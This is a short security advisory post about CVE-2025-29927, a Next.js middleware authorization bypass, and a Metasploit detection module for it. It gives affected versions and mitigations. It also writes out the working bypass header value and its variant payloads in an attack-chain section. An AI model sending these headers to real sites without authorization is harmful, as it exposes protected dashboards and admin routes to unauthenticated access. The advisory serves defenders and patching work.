OFFSITE.DARK
← Signals

Jun 29, 2026

2 min

Sploitus

  • nextjs
  • middleware
  • auth-bypass
  • cve-2025-29927
  • metasploit

news

Next.js Middleware Authorization Bypass Scanner (CVE-2025-29927)

x-middleware-subrequest header skips middleware auth gates on self-hosted Next.js < 12.3.5 / 13.5.9 / 14.2.25 / 15.2.3 — CVSS 9.1.

Summary

CVE-2025-29927 is a critical authorization bypass in self-hosted Next.js middleware with CVSS 9.1. Rapid7's Metasploit module auxiliary/scanner/http/nextjs_middleware_auth_bypass detects vulnerable instances.

Next.js tags internal subrequests with the x-middleware-subrequest header and skips middleware when it sees the value — but the header is trusted from external clients. An attacker supplying crafted values bypasses authentication, authorization, and redirect logic implemented in middleware.

Not CVE-2025-55182 (React2Shell / Server Components RCE) — this is a separate middleware-trust flaw discovered by zhero and inzo.

Affected self-hosted lines: < 12.3.5, < 13.5.9, < 14.2.25, < 15.2.3 (fixed in those patch releases).

Key Findings

FindingDetail
CVECVE-2025-29927
WeaknessTrusted external x-middleware-subrequest header
Bypass payloadsFive-value recursion (middleware:middleware:…), src/middleware variants, single middleware, pages/_middleware
Scanner methodDifferential: baseline gated path (401/403/redirect) vs same path with header
Module typeDetection only — does not act on bypassed response
Disclosure2025-03-21

Attack Chain

GET /dashboard (middleware-gated) → 401/403 or redirect to login
        ↓
GET /dashboard + x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
        ↓
Middleware skipped → protected page served (200) or redirect target changes
        ↓
Unauthenticated access to routes behind middleware auth

Next.js ≥ ~13.2 requires the middleware module name five times (MAX_RECURSION_DEPTH); earlier versions accept a single occurrence.

Impact

Self-hosted Next.js apps that rely on middleware for auth (dashboards, admin panels, API route gates) are fully bypassable on vulnerable builds. Vercel-hosted deployments are not affected per vendor guidance.

Mitigation

  1. Upgrade to 12.3.5+, 13.5.9+, 14.2.25+, or 15.2.3+ depending on your release line.
  2. Strip or block x-middleware-subrequest at reverse proxy/WAF for defense in depth.
  3. Do not rely solely on middleware for security boundaries — enforce auth in server components/API handlers too.

Related Signals

Sources

→ Source